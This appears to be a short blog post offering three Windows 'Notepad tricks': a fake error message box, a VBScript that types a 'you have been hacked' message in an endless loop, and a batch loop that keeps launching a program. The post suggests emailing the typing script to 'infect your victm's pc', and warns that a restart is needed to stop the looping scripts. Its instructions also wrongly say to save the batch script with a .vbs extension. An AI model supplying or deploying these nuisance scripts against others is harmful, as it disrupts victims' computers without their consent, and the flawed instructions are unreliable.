3 Notepad Tricks you should Try!


 

 

 

 

 

 

 

 

 

So, you all know what is notepad, Its a stock text editor provided with Microsoft Windows. We all use Notepad to View and Edit texts, but it can open various file formats. Notepad's functions doesnot stop there, it can do some other cool tricks

 

Today we will explore 3 cool trick with notepad:


1)Fake Error: This trick will show a fake error on your screen.


 

 

 

 

 

 

 

 

1. Open Notepad and paste the following line.

X=Msgbox("You have been online for too long, go sleep",0+16,"sleep")

 

2. Replace You have been online for too long and go sleep with your own message.

 

3. Save the file as anyname.vbs

 

2)Ghost Keyboard: This trick will make you keyboard type automatically.

 

1. Open Notepad and paste the following 

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "We are anonymous, you have been hacked"
loop 

 

2. Replace  We are anonymous, you have been hacked with your own message.

 

3. Save the file as anyname.vbs

 

Note: You can send this file in email to infect your victm's pc with ghost keybooard

 

WARNING: DO NOT OPEN THIS FILE OR YOUR KEYBOARD WILL GO CRAZY. You will have to restart your computer to stop this

 

 3) Open any Program Continously: Title Says it

 

Note: In this case i use Notepad

 

1. Open Notepad and paste the following 

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top 

 

2) You can Replace %SystemRoot%\system32\notepad.exe with your own file path

 

3)Save the file as anyname.vbs

 

WARNING: DO NOT OPEN THIS FILE OR YOU WILL GO CRAZY. You will have to restart your computer to stop this

 

Alright guys, that does it for this article. For more articles like this, make sure to follow our website. See you In the next Article.

 

NOTE: THIS ARTICLE IS ONLY FOR EDUCATIONAL PURPOSES. NONE SHALL BE TRIED WITHOUT THE VICTM'S PERMISSION.


 





Comments

Popular posts from this blog

Rooting And Why Should We Root Our Smartphones And Iphones

Top 5 Xposed Modules